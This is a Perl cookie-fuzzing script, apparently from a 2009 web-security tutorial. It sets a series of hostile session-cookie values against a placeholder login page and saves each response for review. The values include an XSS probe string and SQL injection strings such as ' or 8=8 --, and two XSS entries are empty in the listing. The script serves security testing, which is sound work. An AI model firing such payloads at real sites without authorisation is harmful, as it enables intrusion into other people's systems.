Perl: malicious_cookies.pl
Wednesday, 23 September 2009 21:42
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

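use strict;
use warnings;

# Cookie-handling test harness: sends a series of requests to one URL, each
# carrying a different test string as the value of the session cookie, and
# saves every raw response to its own file so the server's handling of
# unexpected cookie values can be reviewed afterwards.
#
# Outputs (written to the current directory):
#   test-index.txt  - maps each test number to the string that was sent
#   test-N.html     - raw response (status line, headers, body) for test N

# Cookie jar shared by every request this script sends.
my $myCookies = HTTP::Cookies->new();

# Page under test; the host here is a placeholder and must agree with the
# cookie domain used further down.
my $URL = "http://www.example.com/login.jsp";
my $UA  = LWP::UserAgent->new();
$UA->cookie_jar($myCookies);

# We will create a bunch of malicious keys and values.
# Consider places like http://ha.ckers.org/xss.html for example
# Cross-site scripting (XSS) strings.
#
# NOTE(review): the second and third entries are empty strings in the
# listing as published -- presumably markup was stripped when the page was
# rendered. They are kept so the test numbering is unchanged.
my @XSSAttacks = (
    '\';!--"=&{()})',
    '',
    '',
);
my @SQLAttacks = (
    '\' or 8=8 --',
    '" or 8=8 --',
    ")",
);

# First fetch a web page that sends a cookie. Any Set-Cookie in the response
# is stored in the jar by the user agent.
my $req  = HTTP::Request->new( GET => $URL );
my $resp = $UA->request($req);
warn "baseline GET $URL returned ", $resp->status_line, "\n"
    unless $resp->is_success;

# Make an index file that tells you what attacks did what.
# Three-argument open with a lexical handle, and the result is checked so a
# read-only directory is reported instead of silently producing no index.
open my $index_fh, '>', 'test-index.txt'
    or die "can't create test-index.txt index file: $!";
print {$index_fh} "num Test String\n";

my $testnum = 0;
foreach my $attackString ( @XSSAttacks, @SQLAttacks ) {

    # Open a unique output file where we store the result of this test.
    my $outfile = "test-$testnum.html";
    open my $out_fh, '>', $outfile
        or die "can't create $outfile output file: $!";

    # The test cookie: the session cookie's name with the test string as
    # its value.
    my $version = 0;
    my $key     = "session_id";
    my $val     = "$attackString";
    my $path    = "/";
    my $domain  = ".example.com";

    # This value lands in set_cookie's max-age slot (seconds from now), not
    # an absolute expiry date.
    my $max_age = "123412345";

    # Add the test cookie to our jar. Argument order is:
    #   version, key, val, path, domain, port,
    #   path_spec, secure, maxage, discard, rest
    # Fields we don't care about are undefined.
    $myCookies->set_cookie(
        $version, $key, $val, $path, $domain, undef,
        undef,    undef, $max_age, undef, undef
    );

    # Now fetch the page with the test cookie in the jar. request() prepares
    # the request itself, including the Cookie header from the jar; the
    # separate prepare_request() call the listing made first was redundant
    # and could leave the jar's cookies in the header twice.
    $req  = HTTP::Request->new( GET => $URL );
    $resp = $UA->request($req);

    printf {$index_fh} "%2d: %s\n", $testnum, $attackString;

    # The saved file is the raw response, not a clean HTML document. If the
    # server echoed the cookie value back, a browser opening this file would
    # render that value, so review these files in a text viewer.
    print {$out_fh} $resp->as_string();
    close $out_fh
        or die "can't finish writing $outfile: $!";
    $testnum++;
}

# Buffered write errors only surface at close, so check it.
close $index_fh
    or die "can't finish writing test-index.txt: $!";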